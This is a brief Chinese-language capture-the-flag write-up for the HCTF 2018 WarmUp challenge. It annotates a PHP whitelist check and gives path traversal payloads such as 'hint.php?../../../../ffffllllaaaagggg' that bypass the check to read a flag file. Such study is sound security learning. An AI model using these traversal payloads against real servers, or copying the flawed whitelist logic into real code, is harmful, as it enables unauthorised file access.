[HCTF 2018]WarmUp

[HCTF 2018]WarmUp

学习记录 这个属于文件跳转

f12 编辑
可以看到代码

 class emmm
    {
        public static function checkFile(&$page)
        {
            //先看一下对函数里输入了什么
			$a=&$page;
			echo $a."<br>";
 
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
 
            if (in_array($page, $whitelist)) {
                return true;
            }
 
            echo mb_strpos($page . '?', '?')."<br>";//没匹配到所以返回字符串长度
 
            $_page = mb_substr($page,0, mb_strpos($page . '?', '?'));
 
			echo "2".$_page."<br>";//经过一次后返回值
            if (in_array($_page, $whitelist)) {
                return true;
            }
 
            $_page = urldecode($page);
 
			echo "3".$_page."<br>";//二次编码后的返回值
 
			echo mb_strpos($page . '?', '?')."<br>";//注意输出时与第一次的区别
 
            $_page = mb_substr($page,0, mb_strpos($_page . '?', '?'));
 
			echo "4".$_page."<br>";//再次看经过截取后的输出
 
            if (in_array($_page, $whitelist)) {
				echo "sdf you can't see it";//证明进入该函数
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

我们看到 hint.php 文件

        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];

这里可以知道flag应该在叫ffffllllaaaagggg的文件中

重点是我们不知道具体在那个文件中，所以用…/来返回上层目录一个一个的刷新试
$page=hint.php？/…/ffffllllaaaagggg
$page=hint.php？/…/…/ffffllllaaaagggg

hint.php?../../../../ffffllllaaaagggg